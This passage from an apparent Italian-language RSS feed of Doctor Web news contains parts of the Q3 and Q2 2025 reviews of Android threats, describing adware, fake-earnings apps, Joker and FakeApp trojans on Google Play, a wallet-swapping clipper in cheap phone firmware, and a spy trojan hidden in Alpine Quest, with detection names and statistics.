        &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito hanno una lista dei sistemi di pagamento e delle banche più popolari attraverso cui presumibilmente sarebbe possibile trasferire i premi. Ma anche quando gli utenti riescono ad accumulare la somma sufficiente per il prelievo, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, al modificatore compare la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Applicazione che consente di monitorare utenti attraverso i dispositivi Android. Utilizzando questo programma, i malintenzionati possono rilevare la posizione dei dispositivi di destinazione, utilizzare la fotocamera per registrare video e scattare foto, effettuare l'ascolto tramite il microfono, creare registrazioni audio ecc.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/03_riskware_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/03_riskware_q3_2025_en.1.png" alt="Riskware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. In tali programmi è incorporato un modulo speciale che consente di aggirare il controllo della firma digitale dopo la loro modifica.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo. &lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di una serie di versioni potenzialmente pericolose di un framework specializzato per lo sviluppo di programmi Android nel linguaggio di programmazione di scripting Lua. La logica principale di applicazioni Lua è situata in script corrispondenti che sono cifrati e vengono decifrati dall'interprete prima dell'esecuzione. Spesso questo framework di default chiede l'accesso a un gran numero di autorizzazioni di sistema per il funzionamento. Come risultato, gli script Lua eseguiti attraverso di esso sono in grado di effettuare varie azioni malevole in base alle autorizzazioni ricevute.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/04_adware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/04_adware_q2_2025_en.1.png" alt="Adware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Moduli adware che possono essere integrati in programmi Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questi moduli raccolgono una serie di dati riservati, nonché sono in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di alcune versioni modificate (mods) dell'app di messaggistica WhatsApp, nelle funzionalità delle quali è incorporato un codice per caricare i link di destinazione tramite web view durante l'utilizzo dell'app. Da questi indirizzi internet viene eseguito il reindirizzamento verso i siti pubblicizzati — ad esempio, casinò online e scommesse, siti per adulti.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Youmi&amp;lng=it"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di un modulo adware indesiderato che colloca scorciatoie pubblicitarie sulla schermata iniziale di dispostivi Android.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Applicazioni che visualizzano annunci pubblicitari indesiderati che spesso portano a siti malevoli e truffaldini. Hanno una base di codice comune con i programmi indesiderati &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.&lt;/dd&gt;
    &lt;/dl&gt;

&lt;/section&gt;

&lt;section&gt;

    &lt;h3&gt;Minacce su Google Play&lt;/h3&gt;

    &lt;p&gt;Nel III trimestre 2025 il laboratorio antivirus Doctor Web ha registrato sullo store di app Google Play oltre 50 trojan della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che iscrivono utenti a servizi a pagamento. Venivano distribuiti sotto le vesti di vari software, tra cui app di messaggistica, svariate utility di sistema, programmi per modificare immagini, scattare foto, gestire documenti ecc.&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/05_Android.Joker.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/05_Android.Joker.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p style="text-align: center;"&gt;&lt;em&gt;Uno dei trojan era nascosto in un programma per l'ottimizzazione del sistema Clean Boost (&lt;b&gt;Android.Joker.2412&lt;/b&gt;), un altro in un'app Convert Text to PDF (&lt;b&gt;Android.Joker.2422&lt;/b&gt;) per la conversione del testo in documenti PDF&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;Inoltre, i nostri specialisti hanno individuato gli ennesimi programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che vengono utilizzati in schemi fraudolenti. Come in precedenza, alcuni di essi venivano spacciati dai cybercriminali per applicazioni finanziarie — guide, tutorial, software per l'accesso a servizi web di investimento. Queste falsificazioni caricavano siti fraudolenti. Altri programmi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; venivano distribuiti sotto le apparenze di giochi e, a determinate condizioni, invece di fornire le funzionalità promesse, caricavano siti di scommesse e casinò online.&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/06_Android.FakeApp.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/06_Android.FakeApp.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p style="text-align: center;"&gt;&lt;em&gt;Esempi di trojan &lt;b&gt;Android.FakeApp&lt;/b&gt;, mascherati da applicazioni a tema finanziario. &lt;b&gt;Android.FakeApp.1889&lt;/b&gt; invitava utenti a controllare la propria alfabetizzazione finanziaria, e &lt;b&gt;Android.FakeApp.1890&lt;/b&gt; a sviluppare la propria mentalità finanziaria&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;Inoltre, i nostri esperti hanno individuato un programma indesiderato &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, che veniva distribuito con il pretesto di un'applicazione Zeus Jackpot Mania. Gli utenti di questo software ricevevano premi virtuali che quindi presumibilmente potrebbero essere convertiti in denaro reale e prelevati dall'applicazione.&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/09_Program.FakeMoney.16_1_Zeus Jackpot Mania.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/09_Program.FakeMoney.16_1_Zeus Jackpot Mania.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p style="text-align: center;"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; sullo store di app Google Play&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;Per il "prelievo" del denaro, il programma chiedeva una serie di dati, tuttavia, alla fine le vittime non ricevevano alcun pagamento.&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/10_Program.FakeMoney.16.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/10_Program.FakeMoney.16.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p style="text-align: center;"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; chiede di indicare il nome completo dell'utente e le informazioni sull'account bancario&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;Per proteggere i dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.&lt;/p&gt;

    &lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q3%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicatori di compromissione&lt;/a&gt;

&lt;/section&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15027&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in II trimestre 2025</title><link>https://news.drweb-av.it/show/?i=15027&amp;lng=it&amp;c=9</link><pubDate>Tue, 01 Jul 2025 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 luglio 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel II trimestre 2025 i programmi malevoli più diffusi di nuovo sono stati i trojan pubblicitari di varie famiglie. La maggiore attività si osservava da parte dei campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, nonostante che gli utenti li riscontrassero l'8,62% meno spesso. Sono seguiti dai trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;, il numero di attacchi con la partecipazione dei quali è aumentato dell'11,17%. I programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, utilizzati in vari schemi fraudolenti, chiudono la top tre di leader — venivano rilevati sui dispositivi protetti il 25,17% meno spesso.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        È stato notato un aumento dell'attività dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; — del 73,15% rispetto 
        al trimestre precedente. Contemporaneamente alcune altre famiglie venivano rilevate meno frequentemente; ad 
        esempio, &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; — del 37,19%, e &lt;b&gt;Android.SpyMax&lt;/b&gt; — del 19,14%.
    &lt;/p&gt;
    &lt;p&gt;
        Ad aprile i nostri analisti dei virus &lt;a href="https://news.drweb.com/show/?i=15002&amp;lng=en" target="_blank"&gt;hanno segnalato&lt;/a&gt; 
        una campagna per il furto di criptovalute a proprietari di smartphone Android. Nel suo ambito i malintenzionati hanno inserito un 
        trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, nel firmware di una serie di dispositivi economici, nascondendolo in una versione alterata 
        dell'applicazione WhatsApp. Questo programma malevolo intercetta i messaggi inviati e ricevuti nell'app di messaggistica, cerca in 
        essi indirizzi di portafogli delle criptovalute Tron ed Ethereum, e li sostituisce con indirizzi appartenenti ai truffatori. Il trojan 
        occulta la sostituzione furtiva, e gli utenti dei dispositivi infetti vedono in tali messaggi i portafogli "giusti". Inoltre, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; invia a un server remoto tutte le immagini di &lt;i&gt;jpg&lt;/i&gt;, &lt;i&gt;png&lt;/i&gt; e &lt;i&gt;jpeg&lt;/i&gt; 
        al fine di cercare in esse le frasi mnemoniche per i portafogli crypto delle vittime.
    &lt;/p&gt;
    &lt;p&gt;
        Lo stesso mese &lt;a href="https://news.drweb.com/show/?i=15006&amp;lng=en" target="_blank"&gt;abbiamo raccontato&lt;/a&gt; 
        di un trojan spia mirato a militari russi. Il programma malevolo chiamato &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; 
        era nascosto in una delle versioni alterate del software cartografico Alpine Quest. Veniva distribuito sia 
        attraverso un falso canale Telegram dell'app, appartenente ai malintenzionati, e sia su uno dei cataloghi di 
        applicazioni Android russi. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; trasmetteva agli attaccanti vari dati riservati. 
        Tra questi: account dell'utente, suo numero di cellulare, contatti della rubrica, informazioni sulla geolocalizzazione 
        del dispositivo, nonché quelle sui file archiviati su di esso. Su comando dei malintenzionati il trojan poteva rubare 
        file specificati. In particolare, ai malintenzionati interessavano documenti riservati trasmessi tramite i popolari 
        servizi di messaggistica, nonché il file di log delle localizzazioni del programma Alpine Quest.
    &lt;/p&gt;
    &lt;p&gt;
        Oltre a ciò, nel periodo di osservazione passato, il laboratorio dei virus dell'azienda Doctor Web ha individuato 
        ennesime minacce sullo store di app Google Play. Tra queste erano vari trojan, nonché i software pubblicitari indesiderati.
    &lt;/p&gt;
    &lt;div class="colorful"&gt;
        &lt;h3&gt;Principali tendenze di II trimestre&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;Calata l'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;Aumentata l'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;Trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; rilevati più frequentemente sui dispositivi protetti, rispetto al trimestre precedente&lt;/li&gt;
            &lt;li&gt;Sceso il numero di attacchi delle famiglie di trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; e &lt;b&gt;Android.SpyMax&lt;/b&gt;&lt;/li&gt;
            &lt;li&gt;Nei firmware di una serie di smartphone Android economici rilevato un trojan per il furto di criptovalute&lt;/li&gt;
            &lt;li&gt;Malintenzionati distribuivano un trojan che spiava militari russi&lt;/li&gt;
            &lt;li&gt;Nuove minacce rilevate sullo store di app Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h3&gt;Secondo i dati di Dr.Web Security Space per dispositivi mobili&lt;/h3&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/01_malware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/01_malware_q2_2025_en.png" alt="Malware_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programmi trojan per la visualizzazione di pubblicità invadenti. I campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; spesso vengono distribuiti sotto le apparenze di applicazioni innocue e in alcuni casi vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza sul sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma trojan che visualizza annunci pubblicitari invadenti. È un modulo software che gli sviluppatori software incorporano nelle applicazioni.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/02_unwanted_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/02_unwanted_q2_2025_en.png" alt="Unwanted_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito hanno una lista dei sistemi di pagamento e delle banche più popolari attraverso cui presumibilmente sarebbe possibile trasferire i premi. Ma anche quando gli utenti riescono ad accumulare la somma sufficiente per il prelievo, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, al modificatore compare la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;    
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di un'applicazione che consente di monitorare gli utenti attraverso i dispositivi Android. Utilizzando questo programma, i malintenzionati possono rilevare la posizione dei dispositivi di destinazione, utilizzare la fotocamera per registrare video e scattare foto, effettuare l'ascolto tramite il microfono, creare registrazioni audio ecc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di varie versioni di un'applicazione per la ripresa di foto e video in background attraverso le fotocamere integrate di dispositivi Android. Questo programma può funzionare impercettibilmente consentendo di disattivare le notifiche di registrazione, nonché cambiare con quelle false l'icona e la descrizione dell'app. Tali funzionalità lo rendono potenzialmente pericoloso.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/03_riskware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/03_riskware_q2_2025_en.png" alt="Riskware_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. In tali programmi è incorporato un modulo speciale che consente di aggirare il controllo della firma digitale dopo la loro modifica.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di una serie di versioni potenzialmente pericolose di un framework specializzato per lo sviluppo di programmi Android nel linguaggio di programmazione di scripting Lua. La logica principale di applicazioni Lua è situata in script corrispondenti che sono cifrati e vengono decifrati dall'interprete prima dell'esecuzione. Spesso questo framework di default chiede l'accesso a un gran numero di autorizzazioni di sistema per il funzionamento. Come risultato, gli script Lua eseguiti attraverso di esso sono in grado di effettuare varie azioni malevole in base alle autorizzazioni ricevute.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Piattaforma software potenzialmente pericolosa che consente alle applicazioni di avviare i file APK senza la loro installazione. Questa piattaforma crea un ambiente di esecuzione virtuale nel contesto delle applicazioni in cui è incorporata. I file APK avviati tramite di esse possono funzionare come se facessero parte di tali programmi e ricevere automaticamente le stesse autorizzazioni.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Utility packer specializzata per la protezione di applicazioni Android dalla modifica e dal reverse engineering. Non è malevola, ma può essere utilizzata per la protezione di programmi sia innocui che trojan.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/04_adware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/04_adware_q2_2025_en.png" alt="Adware_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
